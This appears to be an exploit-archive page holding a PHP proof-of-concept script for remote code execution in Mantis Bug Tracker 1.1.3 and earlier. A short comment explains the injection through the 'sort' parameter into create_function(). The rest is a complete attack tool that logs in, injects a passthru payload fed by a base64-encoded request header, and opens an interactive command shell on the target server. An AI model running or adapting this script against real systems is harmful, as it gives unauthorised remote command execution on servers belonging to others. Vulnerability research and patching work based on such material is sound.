Mantis Bug Tracker <= 1.1.3 Remote Code Execution Exploit

2008-10-16 02:01:06

<?php

/*
--------------------------------------------------------------------------------
Mantis Bug Tracker <= 1.1.3 (manage_proj_page.php) Remote Code Execution Exploit
--------------------------------------------------------------------------------

author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com

link.....: http://www.mantisbt.org/

This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

[-] vulnerable code in /manage_proj_page.php

32. $f_sort = gpc_get_string( 'sort', 'name' ); <=== this is taken and stripslashed from $_GET['sort']
33. $f_dir = gpc_get_string( 'dir', 'ASC' );

(...)

89. $t_projects = multi_sort( $t_full_projects, $f_sort, $t_direction ); <=== and here is passed to multi_sort()
90. $t_stack = array( $t_projects );

[-] multi_sort() function defined into /core/utility_api.php

185. # --------------------
186. # Sort a multi-dimensional array by one of its keys
187. function multi_sort( $p_array, $p_key, $p_direction=ASCENDING ) {
188. if ( DESCENDING == $p_direction ) {
189. $t_factor = -1;
190. } else {
191. # might as well allow everything else to mean ASC rather than erroring
192. $t_factor = 1;
193. }
194.
195. $t_function = create_function( '$a, $b', "return $t_factor * strnatcasecmp( \$a['$p_key'], \$b['$p_key'] );" );
196. uasort( $p_array, $t_function );
197. return $p_array;
198. }

An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed to create_function()
at line 195 into multi_sort() function body. By default only registered users can access to manage_proj_page.php
(I've tested this on 1.1.3 version), because of this sometimes this PoC works only with a valid account.
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}

function check_login()
{
global $host, $path, $user, $pass, $cookie;

$packet = "GET {$path}manage_proj_page.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";

if (preg_match("/Location: login_page.php/", http_send($host, $packet)))
{
if (isset($pass))
{
$payload = "username={$user}&password={$pass}";
$packet = "POST {$path}login.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID=".md5("foo")."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

if (!preg_match("/Set-Cookie: (.*);/", http_send($host, $packet), $match)) die("\n[-] Login failed...\n");
$cookie = $match[1];
}
else die("\n[-] Credentials needed...\n");
}
}

print "\n+-------------------------------------------------------------------+";
print "\n| Mantis Bug Tracker <= 1.1.3 Remote Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";

if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path [user] [password]\n";
print "\nExample....: php $argv[0] localhost /mantis/";
print "\nExample....: php $argv[0] localhost / user pass\n";
die();
}

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

check_login();

$code = "']);}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
$packet = "GET {$path}manage_proj_page.php?sort={$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID=".md5("foo").(isset($cookie) ? "; {$cookie}" : "")."\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while(1)
{
print "\nmantis-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}

?>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.